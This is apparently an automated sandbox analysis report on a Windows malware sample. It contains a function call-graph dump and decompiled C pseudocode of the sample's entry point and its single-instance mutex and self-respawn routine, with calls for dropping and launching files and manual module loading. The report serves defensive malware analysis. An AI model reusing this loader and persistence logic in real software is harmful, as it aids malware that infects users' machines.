2166->2168 2167->2163 2170 d19315 2168->2170 2175 d19320 GetModuleFileNameW 2169->2175 2170->2161 2176 d1934e GetProcessHeap RtlAllocateHeap 2175->2176 2178 d19389 2176->2178 2179 d193a2 lstrlen 2178->2179 2180 d193b4 GetProcessHeap HeapFree 2179->2180 2182 d11830 2 API calls 2180->2182 2183 d19429 2182->2183 2184 d11830 2 API calls 2183->2184 2185 d19476 7 API calls 2184->2185 2186 d19552 GetComputerNameW 2185->2186 2187 d194f9 CreateFileMappingW 2185->2187 2190 d19570 GetProcessHeap RtlAllocateHeap 2186->2190 2191 d192e4 2186->2191 2188 d19510 MapViewOfFile 2187->2188 2189 d1954b CloseHandle 2187->2189 2192 d19525 GetFileSize RtlComputeCrc32 UnmapViewOfFile 2188->2192 2193 d19544 CloseHandle 2188->2193 2189->2186 2195 d195c4 2190->2195 2197 d19060 memset 2191->2197 2192->2193 2193->2189 2196 d195dd _snprintf GetProcessHeap HeapFree 2195->2196 2196->2191 2198 d11830 2 API calls 2197->2198 2199 d19092 _snwprintf GetProcessHeap HeapFree CreateMutexW 2198->2199 2200 d190d6 WaitForSingleObject 2199->2200 2201 d1924f 2199->2201 2202 d190e2 2200->2202 2219 d18aa0 2201->2219 2202->2201 2203 d11830 2 API calls 2202->2203 2204 d19105 _snwprintf GetProcessHeap HeapFree 2203->2204 2205 d11830 2 API calls 2204->2205 2206 d19149 _snwprintf GetProcessHeap HeapFree CreateMutexW 2205->2206 2206->2201 2207 d19193 CreateEventW 2206->2207 2208 d191d9 ReleaseMutex CloseHandle 2207->2208 2209 d191af SignalObjectAndWait 2207->2209 2208->2201 2212 d191eb GetTickCount CreateTimerQueueTimer 2208->2212 2210 d191c4 2209->2210 2211 d191cb ResetEvent 2209->2211 2210->2208 2210->2211 2211->2208 2214 d19243 CloseHandle 2212->2214 2215 d19228 WaitForSingleObject DeleteTimerQueueTimer 2212->2215 2214->2201 2215->2214 2220 d18aac 2219->2220 2221 d18ad1 WaitForSingleObject 2220->2221 2222 d18b26 2220->2222 2223 d18aef VirtualFree CloseHandle GetProcessHeap HeapFree 2220->2223 2221->2220 2224 d1a750 2222->2224 2223->2220 2225 d1a764 WaitForSingleObject 2224->2225 2226 d1928e 2224->2226 2227 d1a775 CloseHandle GetProcessHeap HeapFree 2225->2227 2228 d1a794 2225->2228 2226->2161 2227->2228 2228->2225 2228->2226 2229 d18dd0 GetTickCount 2230 d18dec 2229->2230 2240 d18e02 2229->2240 2231 d18e13 2230->2231 2232 d18e52 2230->2232 2233 d18ea4 2230->2233 2230->2240 2261 d19620 lstrcmpiW 2231->2261 2285 d122e0 memset 2232->2285 2289 d18bb0 GetModuleFileNameW lstrlenW 2233->2289 2237 d18e22 2237->2240 2242 d18e2e SetEvent 2237->2242 2239 d18eb7 2305 d18d50 RtlGetVersion GetNativeSystemInfo 2239->2305 2243 d18ec0 lstrlen 2252 d18ef0 2243->2252 2247 d18fe5 GetProcessHeap HeapFree GetProcessHeap HeapFree 2248 d19013 GetTickCount GetProcessHeap HeapFree 2247->2248 2247->2252 2248->2240 2250 d18fd2 GetProcessHeap HeapFree 2250->2247 2252->2247 2252->2250 2254 d1a750 4 API calls 2252->2254 2256 d18f9c GetProcessHeap HeapFree 2252->2256 2259 d11750 GetLastError 2252->2259 2306 d18920 2252->2306 2310 d1a7a0 2252->2310 2314 d19f80 2252->2314 2326 d18520 2252->2326 2352 d199a0 2252->2352 2362 d188b0 2252->2362 2367 d1a180 memset 2252->2367 2369 d19a90 memset memset 2252->2369 2390 d18990 2252->2390 2399 d1a810 2252->2399 2254->2252 2256->2250 2259->2252 2262 d19640 2261->2262 2263 d19647 2261->2263 2262->2237 2404 d118d0 memset 2263->2404 2266 d1969c 2267 d196a9 GetTempPathW GetTempFileNameW 2266->2267 2269 d196ee 2266->2269 2267->2269 2276 d19787 2269->2276 2410 d11970 2269->2410 2270 d19730 2271 d19935 memset CreateProcessW 2270->2271 2273 d1973d 2270->2273 2272 d19982 CloseHandle CloseHandle 2271->2272 2271->2276 2272->2276 2274 d197c8 GetLastError 2273->2274 2273->2276 2275 d197d9 GetProcessHeap RtlAllocateHeap 2274->2275 2274->2276 2275->2276 2283 d197f8 2275->2283 2276->2237 2277 d198d2 GetProcessHeap HeapFree 2277->2276 2279 d198ed GetProcessHeap HeapFree 2277->2279 2279->2276 2281 d1986e GetLastError 2282 d19879 GetProcessHeap RtlAllocateHeap 2281->2282 2281->2283 2282->2283 2283->2277 2283->2281 2284 d198a9 GetProcessHeap HeapFree 2283->2284 2284->2283 2286 d1230f 2285->2286 2287 d12362 LocalFree 2286->2287 2288 d12371 2286->2288 2287->2288 2290 d18c0e 2289->2290 2413 d12110 CreateToolhelp32Snapshot 2290->2413 2293 d18c58 GetProcessHeap RtlAllocateHeap 2295 d18d3a 2293->2295 2301 d18c78 2293->2301 2294 d18c40 lstrlenW 2294->2294 2296 d18c53 2294->2296 2295->2239 2296->2293 2297 d18cc4 WideCharToMultiByte 2299 d18d15 GetProcessHeap HeapFree 2297->2299 2300 d18cde GetProcessHeap RtlAllocateHeap 2297->2300 2298 d18c80 lstrcmpiW 2298->2301 2302 d18c8f lstrcpyW lstrlenW 2298->2302 2299->2239 2300->2299 2303 d18cf4 WideCharToMultiByte 2300->2303 2301->2297 2301->2298 2302->2301 2303->2299 2304 d18d13 2303->2304 2304->2299 2305->2243 2307 d18933 2306->2307 2309 d1895a 2306->2309 2307->2307 2308 d1893c GetProcessHeap RtlAllocateHeap 2307->2308 2308->2309 2309->2252 2311 d1a7b3 2310->2311 2313 d1a7da 2310->2313 2311->2311 2312 d1a7bc GetProcessHeap RtlAllocateHeap 2311->2312 2312->2313 2313->2252 2316 d19f9d 2314->2316 2315 d1a01b GetProcessHeap RtlAllocateHeap 2317 d1a16c 2315->2317 2319 d1a05a 2315->2319 2316->2315 2316->2316 2317->2252 2318 d1a09f memcpy 2320 d1a0da 2318->2320 2321 d1a0ef memcpy 2318->2321 2319->2318 2319->2319 2320->2321 2322 d1a123 memcpy 2321->2322 2323 d1a114 2321->2323 2324 d1a157 memcpy 2322->2324 2325 d1a148 2322->2325 2323->2322 2323->2323 2324->2317 2325->2324 2325->2325 2429 d18420 GetProcessHeap RtlAllocateHeap 2326->2429 2328 d18544 2329 d186f2 2328->2329 2435 d18700 2328->2435 2329->2252 2332 d186e0 GetProcessHeap HeapFree 2332->2329 2334 d186ce GetProcessHeap HeapFree 2334->2332 2336 d11830 2 API calls 2337 d185a6 _snwprintf GetProcessHeap HeapFree 2336->2337 2449 d11c50 memset 2337->2449 2340 d186ad GetProcessHeap HeapFree GetProcessHeap HeapFree 2340->2334 2343 d18692 2343->2340 2345 d18631 2345->2343 2471 d12530 2345->2471 2347 d18644 2348 d18680 GetProcessHeap HeapFree 2347->2348 2349 d18670 GetProcessHeap HeapFree 2347->2349 2480 d184c0 GetProcessHeap RtlAllocateHeap 2347->2480 2348->2343 2349->2348 2351 d18668 2351->2349 2353 d199b6 2352->2353 2354 d19a7e 2352->2354 2355 d11830 2 API calls 2353->2355 2354->2252 2356 d199cf _snwprintf 2355->2356 2357 d199f2 2356->2357 2358 d19a6b GetProcessHeap HeapFree 2356->2358 2359 d11830 2 API calls 2357->2359 2358->2354 2361 d19a0a GetProcessHeap HeapFree 2359->2361 2361->2358 2363 d188c4 WaitForSingleObject 2362->2363 2364 d18918 2362->2364 2365 d188d5 2363->2365 2364->2252 2365->2363 2365->2364 2366 d188e1 VirtualFree CloseHandle GetProcessHeap HeapFree 2365->2366 2366->2365 2368 d1a1a0 2367->2368 2368->2252 2370 d19ad0 2369->2370 2371 d19ad8 GetLastError 2370->2371 2372 d19ae7 GetTickCount 2370->2372 2371->2370 2588 d12240 GetTickCount 2372->2588 2375 d11830 2 API calls 2376 d19b22 _snwprintf GetProcessHeap HeapFree 2375->2376 2377 d19b60 2376->2377 2378 d19b68 GetLastError 2377->2378 2379 d19b77 CreateFileW 2377->2379 2378->2377 2380 d19ba0 2379->2380 2381 d19ba8 GetLastError 2380->2381 2382 d19bb7 2380->2382 2381->2380 2383 d19bbc WriteFile CloseHandle 2382->2383 2385 d19bd4 2382->2385 2383->2385 2384 d19be0 GetLastError 2384->2385 2385->2384 2386 d19bef CreateProcessW 2385->2386 2387 d19c16 Sleep 2386->2387 2388 d19c2e CloseHandle CloseHandle 2386->2388 2387->2385 2389 d19c27 2387->2389 2388->2252 2389->2252 2396 d189a3 2390->2396 2391 d18a90 2391->2252 2393 d18a01 GetProcessHeap RtlAllocateHeap 2393->2396 2395 d18a7b GetProcessHeap HeapFree 2395->2396 2396->2391 2396->2393 2396->2395 2397 d18a38 CreateThread 2396->2397 2398 d18a6b VirtualFree 2396->2398 2590 d187c0 memset 2396->2590 2592 d11f40 2396->2592 2397->2396 2397->2398 2603 d18880 2397->2603 2398->2395 2402 d1a820 2399->2402 2400 d1a87c 2400->2252 2402->2400 2605 d1a2b0 memset 2402->2605 2607 d1a690 GetProcessHeap RtlAllocateHeap 2402->2607 2406 d118fb 2404->2406 2409 d11949 memset memset 2404->2409 2405 d11917 GetFileAttributesW 2405->2406 2407 d11929 CreateDirectoryW 2405->2407 2406->2405 2406->2409 2407->2406 2408 d1193c GetLastError 2407->2408 2408->2406 2408->2409 2409->2266 2411 d11830 2 API calls 2410->2411 2412 d11992 _snwprintf GetProcessHeap HeapFree DeleteFileW 2411->2412 2412->2270 2414 d1217a 2413->2414 2415 d1212e Process32FirstW 2413->2415 2414->2293 2414->2294 2416 d12173 CloseHandle 2415->2416 2418 d1214a 2415->2418 2416->2414 2418->2416 2419 d12161 Process32NextW 2418->2419 2420 d18b30 2418->2420 2419->2416 2419->2418 2427 d119e0 2420->2427 2423 d18ba1 2423->2418 2424 d18b52 2424->2423 2425 d18b6e GetProcessHeap RtlAllocateHeap 2424->2425 2425->2423 2426 d18b88 lstrcpyW 2425->2426 2426->2423 2428 d119ea GetCurrentProcessId 2427->2428 2428->2423 2428->2424 2430 d184a9 2429->2430 2431 d1847b 2429->2431 2430->2328 2486 d129b0 memset 2431->2486 2433 d18489 2433->2430 2434 d18490 GetProcessHeap HeapFree 2433->2434 2434->2328 2437 d18713 2435->2437 2436 d18739 GetProcessHeap RtlAllocateHeap 2438 d1856f 2436->2438 2440 d18759 2436->2440 2437->2436 2437->2437 2438->2332 2441 d123f0 2438->2441 2439 d187a0 memcpy 2439->2438 2440->2439 2440->2440 2442 d12412 GetProcessHeap RtlAllocateHeap 2441->2442 2443 d1240c 2441->2443 2444 d12524 2442->2444 2445 d1243c 2442->2445 2443->2442 2444->2334 2444->2336 2446 d12506 GetProcessHeap HeapFree 2445->2446 2447 d1245c memcpy 2445->2447 2446->2444 2448 d1248a 2447->2448 2448->2444 2448->2446 2450 d11c8b 2449->2450 2451 d11cd6 GetProcessHeap HeapFree 2450->2451 2452 d11c8f MultiByteToWideChar 2450->2452 2456 d11d00 2451->2456 2452->2451 2453 d11ca8 GetProcessHeap RtlAllocateHeap 2452->2453 2453->2451 2454 d11cc1 MultiByteToWideChar 2453->2454 2454->2451 2456->2340 2457 d11d40 2456->2457 2458 d11d7a 2457->2458 2459 d11d64 2457->2459 2461 d11d9f GetProcessHeap HeapFree 2458->2461 2462 d11daf 2458->2462 2460 d11830 2 API calls 2459->2460 2460->2458 2461->2462 2462->2343 2463 d11e50 2462->2463 2464 d11e7b 2463->2464 2465 d11e83 GetProcessHeap RtlAllocateHeap 2464->2465 2466 d11f2a 2464->2466 2467 d11f22 2465->2467 2470 d11ea0 2465->2470 2466->2345 2467->2345 2468 d11ef8 GetProcessHeap HeapFree 2469 d11f0c 2468->2469 2469->2345 2470->2468 2470->2469 2472 d12552 2471->2472 2473 d1254a 2471->2473 2472->2473 2474 d12563 GetProcessHeap RtlAllocateHeap 2472->2474 2473->2347 2475 d12625 2474->2475 2476 d12584 2474->2476 2475->2347 2477 d125d0 2476->2477 2478 d125a4 memcpy 2476->2478 2477->2475 2479 d12608 GetProcessHeap HeapFree 2477->2479 2478->2477 2479->2475 2481 d18515 2480->2481 2482 d184e8 2480->2482 2481->2351 2574 d12d80 memset 2482->2574 2484 d184f5 2484->2481 2485 d184fc GetProcessHeap HeapFree 2484->2485 2485->2351 2487 d129e6 2486->2487 2488 d129db 2486->2488 2493 d127d0 2487->2493 2488->2433 2490 d12a00 2492 d12a0f 2490->2492 2499 d12870 2490->2499 2492->2433 2494 d127d7 2493->2494 2495 d127dc 2493->2495 2494->2490 2496 d12836 2495->2496 2506 d18290 2495->2506 2496->2490 2498 d1284d 2498->2490 2500 d12884 2499->2500 2501 d128a2 2499->2501 2500->2501 2509 d18090 2500->2509 2501->2492 2503 d12957 2503->2492 2504 d128d9 2504->2503 2505 d18090 12 API calls 2504->2505 2505->2504 2507 d18311 memset memset 2506->2507 2508 d182fa memset 2506->2508 2507->2498 2508->2507 2510 d1809e 2509->2510 2517 d180bf 2509->2517 2510->2504 2511 d1825e 2511->2504 2512 d1824d 2549 d18010 2512->2549 2515 d181b9 2531 d177f0 2515->2531 2517->2511 2517->2512 2517->2515 2518 d181a4 2517->2518 2525 d17390 2518->2525 2519 d181af 2519->2504 2521 d181ab 2521->2512 2521->2519 2536 d16e70 2521->2536 2524 d1821b memset memset 2524->2512 2528 d173d0 2525->2528 2526 d17424 memcpy 2527 d17456 memcpy 2526->2527 2526->2528 2527->2528 2528->2526 2529 d177ad 2528->2529 2530 d16e70 7 API calls 2528->2530 2529->2521 2530->2528 2533 d1781b 2531->2533 2532 d17fda 2532->2521 2533->2532 2534 d16e70 7 API calls 2533->2534 2535 d17fcc 2534->2535 2535->2521 2538 d16e8e 2536->2538 2537 d16fe7 2560 d16a80 2537->2560 2538->2537 2539 d16fdf 2538->2539 2542 d16fe5 2538->2542 2553 d15b10 2539->2553 2543 d16a80 4 API calls 2542->2543 2548 d17025 2542->2548 2543->2548 2544 d1729d memset memset 2545 d17301 2544->2545 2546 d172fc 2544->2546 2545->2512 2545->2519 2545->2524 2546->2545 2547 d17340 memcpy 2546->2547 2547->2545 2548->2544 2550 d1801a 2549->2550 2551 d1802c memcpy 2550->2551 2552 d18074 2550->2552 2551->2552 2552->2504 2566 d158c0 memset 2553->2566 2555 d15b53 2556 d158c0 4 API calls 2555->2556 2558 d15b69 2556->2558 2557 d158c0 4 API calls 2559 d16559 2557->2559 2558->2557 2559->2542 2561 d16aae 2560->2561 2562 d158c0 4 API calls 2561->2562 2563 d16b7c 2562->2563 2564 d158c0 4 API calls 2563->2564 2565 d16b92 2564->2565 2565->2542 2568 d15929 2566->2568 2570 d158f3 2566->2570 2572 d155b0 memset 2568->2572 2569 d1598a 2571 d159c4 memset memset 2569->2571 2570->2555 2570->2570 2571->2570 2573 d155e8 2572->2573 2573->2569 2573->2573 2575 d12dab 2574->2575 2576 d12db6 2574->2576 2575->2484 2578 d12dd9 2576->2578 2579 d12b20 2576->2579 2578->2484 2580 d12b37 2579->2580 2586 d12b73 2579->2586 2581 d12c05 memcpy 2580->2581 2585 d12c71 2580->2585 2580->2586 2582 d12c53 2581->2582 2582->2578 2583 d12cab memcpy 2584 d12d60 2583->2584 2583->2585 2584->2578 2585->2583 2587 d12d27 2585->2587 2586->2578 2587->2578 2589 d12260 2588->2589 2589->2375 2591 d187e0 2590->2591 2591->2396 2593 d11f55 2592->2593 2594 d120ea 2592->2594 2593->2594 2595 d11f87 VirtualAlloc 2593->2595 2594->2396 2595->2594 2596 d11fa2 memcpy 2595->2596 2597 d11ff8 2596->2597 2598 d11fcd 2596->2598 2597->2594 2600 d12090 LoadLibraryA 2597->2600 2602 d120bd GetProcAddress 2597->2602 2599 d11fd0 memcpy 2598->2599 2599->2597 2599->2599 2600->2597 2601 d120f3 VirtualFree 2600->2601 2601->2594 2602->2597 2602->2601 2604 d18893 2603->2604 2606 d1a2d0 2605->2606 2606->2402 2608 d1a741 2607->2608 2609 d1a6b4 memcpy GetProcessHeap RtlAllocateHeap 2607->2609 2608->2402 2610 d1a731 GetProcessHeap HeapFree 2609->2610 2611 d1a6f1 CreateThread 2609->2611 2610->2608 2612 d1a721 GetProcessHeap HeapFree 2611->2612 2613 d1a711 2611->2613 2614 d1a3a0 2611->2614 2612->2610 2613->2402 2615 d1a3b9 2614->2615 2616 d1a54d GetTickCount 2614->2616 2617 d1a3c0 WTSGetActiveConsoleSessionId 2615->2617 2618 d1a666 GetProcessHeap HeapFree 2615->2618 2620 d12240 GetTickCount 2616->2620 2617->2618 2623 d1a3df 2617->2623 2621 d1a584 2620->2621 2624 d11830 2 API calls 2621->2624 2622 d1a40f GetTickCount 2629 d12240 GetTickCount 2622->2629 2623->2622 2626 d1a406 CloseHandle 2623->2626 2625 d1a5a6 _snwprintf GetProcessHeap HeapFree CreateFileW 2624->2625 2625->2618 2628 d1a5fd WriteFile CloseHandle memset CreateProcessW 2625->2628 2626->2622 2628->2618 2630 d1a654 CloseHandle 2628->2630 2632 d1a43d 2629->2632 2631 d1a660 CloseHandle 2630->2631 2631->2618 2633 d11830 2 API calls 2632->2633 2634 d1a45f _snwprintf GetProcessHeap HeapFree CreateFileW 2633->2634 2635 d1a545 2634->2635 2636 d1a4ba WriteFile CloseHandle 2634->2636 2635->2631 2637 d11830 2 API calls 2636->2637 2638 d1a4ea _snwprintf GetProcessHeap HeapFree 2637->2638 2642 d12180 memset 2638->2642 2640 d1a52c 2640->2635 2641 d1a533 CloseHandle CloseHandle 2640->2641 2641->2635 2643 d121ab 2642->2643 2644 d1221c CreateProcessW 2642->2644 2645 d11830 2 API calls 2643->2645 2644->2640 2647 d121c1 GetProcessHeap HeapFree 2645->2647 2647->2640 2648 d12790 GetProcessHeap RtlAllocateHeap 2675 d127b0 GetProcessHeap HeapFree 2676 d11575 2677 d11587 2676->2677 2678 d115d9 2676->2678 2679 d115f4 _snwprintf GetProcessHeap HeapFree 2678->2679 2680 d11830 2 API calls 2678->2680 2681 d11830 2 API calls 2679->2681 2680->2679 2682 d11633 _snwprintf GetProcessHeap HeapFree CreateEventW 2681->2682 2683 d11691 2682->2683 2684 d11673 CreateMutexW 2682->2684 2685 d11699 GetLastError 2684->2685 2686 d1168a CloseHandle 2684->2686 2687 d116a6 SetEvent CloseHandle CloseHandle 2685->2687 2688 d116cb memset CreateProcessW 2685->2688 2686->2683 2689 d19c50 88 API calls 2687->2689 2688->2683 2690 d11711 WaitForSingleObject CloseHandle CloseHandle CloseHandle CloseHandle 2688->2690 2691 d116c0 2689->2691 2664 d15947 2665 d15950 2664->2665 2666 d155b0 memset 2665->2666 2667 d1598a 2666->2667 2668 d159c4 memset memset 2667->2668 2669 d15a08 2668->2669 2692 d15cb6 2694 d15cbf 2692->2694 2693 d158c0 4 API calls 2695 d16559 2693->2695 2694->2693 2649 d11599 GetModuleFileNameW 2650 d115da 2649->2650 2651 d11830 2 API calls 2650->2651 2652 d115f4 _snwprintf GetProcessHeap HeapFree 2651->2652 2653 d11830 2 API calls 2652->2653 2654 d11633 _snwprintf GetProcessHeap HeapFree CreateEventW 2653->2654 2655 d11691 2654->2655 2656 d11673 CreateMutexW 2654->2656 2657 d11699 GetLastError 2656->2657 2658 d1168a CloseHandle 2656->2658 2659 d116a6 SetEvent CloseHandle CloseHandle 2657->2659 2660 d116cb memset CreateProcessW 2657->2660 2658->2655 2661 d19c50 88 API calls 2659->2661 2660->2655 2662 d11711 WaitForSingleObject CloseHandle CloseHandle CloseHandle CloseHandle 2660->2662 2663 d116c0 2661->2663 2696 d11aa9 2697 d11ab0 2696->2697 2697->2697 2698 d11be0 GetPEB 2697->2698 2699 d11ad5 2698->2699 2700 d11aeb 2699->2700 2701 d11ada LoadLibraryW 2699->2701 2703 d11b10 2 API calls 2700->2703 2701->2700 2702 d11afd 2701->2702 2703->2702 2670 d17b0b 2672 d1781b 2670->2672 2671 d16e70 7 API calls 2673 d17fcc 2671->2673 2672->2671 2674 d17fda 2672->2674

                                                                                        Callgraph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        • Opacity -> Relevance
                                                                                        • Disassembly available
                                                                                        callgraph 0 Function_00D127D0 17 Function_00D18290 0->17 34 Function_00D12980 0->34 1 Function_00D118D0 2 Function_00D18DD0 15 Function_00D122E0 2->15 19 Function_00D18990 2->19 23 Function_00D19A90 2->23 35 Function_00D19F80 2->35 36 Function_00D1A180 2->36 42 Function_00D188B0 2->42 43 Function_00D18BB0 2->43 52 Function_00D199A0 2->52 55 Function_00D1A7A0 2->55 59 Function_00D11750 2->59 60 Function_00D1A750 2->60 62 Function_00D18D50 2->62 90 Function_00D1A810 2->90 104 Function_00D18520 2->104 107 Function_00D19620 2->107 108 Function_00D18920 2->108 3 Function_00D184C0 38 Function_00D12D80 3->38 4 Function_00D158C0 8 Function_00D156F0 4->8 44 Function_00D155B0 4->44 93 Function_00D15800 4->93 5 Function_00D187C0 6 Function_00D142C5 7 Function_00D113F1 9 Function_00D123F0 10 Function_00D177F0 74 Function_00D16E70 10->74 11 Function_00D150F6 12 Function_00D152E1 13 Function_00D11BE0 14 Function_00D119E0 16 Function_00D19EE0 16->13 40 Function_00D115B0 16->40 89 Function_00D11B10 16->89 18 Function_00D17390 18->74 19->5 33 Function_00D18880 19->33 67 Function_00D11F40 19->67 20 Function_00D11790 21 Function_00D18090 21->10 21->18 21->74 86 Function_00D18010 21->86 100 Function_00D12630 21->100 22 Function_00D12790 66 Function_00D12240 23->66 97 Function_00D11830 23->97 24 Function_00D1A690 51 Function_00D1A3A0 24->51 25 Function_00D13895 26 Function_00D11594 27 Function_00D11599 27->14 61 Function_00D19C50 27->61 27->97 28 Function_00D12299 29 Function_00D1439B 30 Function_00D1419D 31 Function_00D13C9C 32 Function_00D16A80 32->4 37 Function_00D12180 37->97 82 Function_00D12A60 38->82 110 Function_00D12B20 38->110 39 Function_00D127B0 40->14 40->61 40->97 41 Function_00D1A2B0 87 Function_00D12110 43->87 45 Function_00D129B0 45->0 73 Function_00D12870 45->73 46 Function_00D13AB3 47 Function_00D140B6 48 Function_00D15CB6 48->4 49 Function_00D138BA 50 Function_00D151BD 51->37 51->66 51->97 52->97 53 Function_00D18AA0 54 Function_00D192A0 81 Function_00D19060 54->81 106 Function_00D19320 54->106 56 Function_00D11AA9 56->13 56->89 57 Function_00D112AA 58 Function_00D14350 61->54 61->89 61->97 63 Function_00D11C50 64 Function_00D11E50 65 Function_00D13441 68 Function_00D11D40 68->97 69 Function_00D13943 70 Function_00D15947 70->8 70->44 70->93 71 Function_00D1384B 72 Function_00D13371 73->21 74->32 88 Function_00D15B10 74->88 99 Function_00D16C30 74->99 75 Function_00D11970 75->97 76 Function_00D13870 77 Function_00D19F73 78 Function_00D15473 79 Function_00D11575 79->61 79->97 80 Function_00D13B7D 81->53 81->60 81->97 83 Function_00D13665 84 Function_00D11564 85 Function_00D1556F 98 Function_00D18B30 87->98 88->4 105 Function_00D11A20 89->105 90->24 90->41 91 Function_00D15112 92 Function_00D18700 94 Function_00D15505 95 Function_00D11507 96 Function_00D17B0B 96->74 98->14 101 Function_00D12530 102 Function_00D11134 103 Function_00D1133A 104->3 104->9 104->63 104->64 104->68 104->92 104->97 104->101 109 Function_00D18420 104->109 105->13 105->89 106->20 106->97 107->1 107->75 109->45

                                                                                        Executed Functions

                                                                                        Control-flow Graph

                                                                                        C-Code - Quality: 100%
                                                                                        			_entry_() {
                                                                                        				void* _t6;
                                                                                        				void* _t11;
                                                                                        				void* _t18;
                                                                                        
                                                                                        				E00D11B10(E00D11BE0(0xd22e2014), 0xd111f0, 9, 0x3966646c, 0xd1c1f0);
                                                                                        				E00D11B10(E00D11BE0(0x8f7ee672), 0xd110d0, 0x48, 0x6677a1d2, 0xd1c0d0);
                                                                                        				_t6 = RtlAllocateHeap(GetProcessHeap(), 0, 0x8000000); // executed
                                                                                        				_t18 = _t6;
                                                                                        				if(_t18 != 0) {
                                                                                        					memset(_t18, 0, 0x8000000);
                                                                                        					RtlFreeHeap(GetProcessHeap(), 0, _t18); // executed
                                                                                        					E00D115B0(_t11); // executed
                                                                                        				}
                                                                                        				ExitProcess(0);
                                                                                        			}






                                                                                        0x00d19efe
                                                                                        0x00d19f23
                                                                                        0x00d19f39
                                                                                        0x00d19f3f
                                                                                        0x00d19f43
                                                                                        0x00d19f4d
                                                                                        0x00d19f60
                                                                                        0x00d19f66
                                                                                        0x00d19f66
                                                                                        0x00d19f6d

                                                                                        APIs
                                                                                        • GetProcessHeap.KERNEL32(00000000,08000000), ref: 00D19F32
                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00D19F39
                                                                                        • memset.NTDLL ref: 00D19F4D
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D19F59
                                                                                        • RtlFreeHeap.NTDLL(00000000), ref: 00D19F60
                                                                                          • Part of subcall function 00D115B0: GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,00000000), ref: 00D115C9
                                                                                          • Part of subcall function 00D115B0: _snwprintf.NTDLL ref: 00D11602
                                                                                          • Part of subcall function 00D115B0: GetProcessHeap.KERNEL32(00000000,00D19F6B), ref: 00D1160E
                                                                                          • Part of subcall function 00D115B0: HeapFree.KERNEL32(00000000), ref: 00D11615
                                                                                          • Part of subcall function 00D115B0: _snwprintf.NTDLL ref: 00D11641
                                                                                          • Part of subcall function 00D115B0: GetProcessHeap.KERNEL32(00000000,00D19F6B), ref: 00D1164D
                                                                                          • Part of subcall function 00D115B0: HeapFree.KERNEL32(00000000), ref: 00D11654
                                                                                          • Part of subcall function 00D115B0: CreateEventW.KERNEL32(00000000,00000001,00000000,?), ref: 00D11667
                                                                                          • Part of subcall function 00D115B0: CreateMutexW.KERNELBASE(00000000,00000001,?), ref: 00D1167E
                                                                                          • Part of subcall function 00D115B0: CloseHandle.KERNEL32(00000000), ref: 00D1168B
                                                                                        • ExitProcess.KERNEL32 ref: 00D19F6D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.196824116.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.196819606.0000000000D10000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196835486.0000000000D1B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196839575.0000000000D1C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196843485.0000000000D1D000.00000002.00020000.sdmp Download File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_d10000_9fdUNaHzLv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$Process$Free$Create_snwprintf$AllocateCloseEventExitFileHandleModuleMutexNamememset
                                                                                        • String ID:
                                                                                        • API String ID: 871367918-0
                                                                                        • Opcode ID: 8cff0800c522814d303ff21846317bc5aba1892a78580a2c01393bccd7101a66
                                                                                        • Instruction ID: 299ce477864625a8875f215f36f4fece34c33db82a85e4e79ea1a640a9b98560
                                                                                        • Opcode Fuzzy Hash: 8cff0800c522814d303ff21846317bc5aba1892a78580a2c01393bccd7101a66
                                                                                        • Instruction Fuzzy Hash: C3F06274BD53117BF51037B47C2BBCA39169B41B82F109410BB06EA3D7ED6188C546B9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        C-Code - Quality: 90%
                                                                                        			E00D115B0(void* __ebx) {
                                                                                        				void* _v8;
                                                                                        				struct _PROCESS_INFORMATION _v24;
                                                                                        				struct _STARTUPINFOW _v92;
                                                                                        				short _v220;
                                                                                        				short _v348;
                                                                                        				short _v868;
                                                                                        				intOrPtr* _t23;
                                                                                        				void* _t40;
                                                                                        				int _t47;
                                                                                        				WCHAR* _t61;
                                                                                        				void* _t64;
                                                                                        				void* _t66;
                                                                                        				void* _t67;
                                                                                        				void* _t68;
                                                                                        				void* _t69;
                                                                                        				void* _t70;
                                                                                        
                                                                                        				GetModuleFileNameW(0,  &_v868, 0x104);
                                                                                        				_t61 =  &_v868;
                                                                                        				_t23 = E00D119E0(_t61);
                                                                                        				 *((intOrPtr*)(__ebx + 0x4baf8)) =  *((intOrPtr*)(__ebx + 0x4baf8)) + _t61;
                                                                                        				 *_t23 =  *_t23 + _t23;
                                                                                        				E00D11830(0xd11004, _t64, 0x4dbac13f,  &_v8);
                                                                                        				_t68 = _v8;
                                                                                        				 *0xd1c200( &_v348, 0x40, _t68, _t66);
                                                                                        				HeapFree(GetProcessHeap(), 0, _t68);
                                                                                        				E00D11830(0xd11000, 4, 0x4dbac13f,  &_v8);
                                                                                        				_t69 = _v8;
                                                                                        				 *0xd1c200( &_v220, 0x40, _t69, _t66);
                                                                                        				HeapFree(GetProcessHeap(), 0, _t69);
                                                                                        				_t70 = CreateEventW(0, 1, 0,  &_v348);
                                                                                        				if(_t70 == 0) {
                                                                                        					L4:
                                                                                        					return 0;
                                                                                        				} else {
                                                                                        					_t40 = CreateMutexW(0, 1,  &_v220); // executed
                                                                                        					_t67 = _t40;
                                                                                        					if(_t67 != 0) {
                                                                                        						if(GetLastError() != 0xb7) {
                                                                                        							memset( &_v92, 0, 0x44);
                                                                                        							_v92.cb = 0x44;
                                                                                        							_v92.dwFlags = 0x80;
                                                                                        							_t47 = CreateProcessW( &_v868, 0, 0, 0, 0, 0, 0, 0,  &_v92,  &_v24); // executed
                                                                                        							if(_t47 == 0) {
                                                                                        								goto L4;
                                                                                        							} else {
                                                                                        								WaitForSingleObject(_t70, 0xffffffff);
                                                                                        								CloseHandle(_v24);
                                                                                        								CloseHandle(_v24.hThread);
                                                                                        								CloseHandle(_t70);
                                                                                        								CloseHandle(_t67);
                                                                                        								return 1;
                                                                                        							}
                                                                                        						} else {
                                                                                        							SetEvent(_t70);
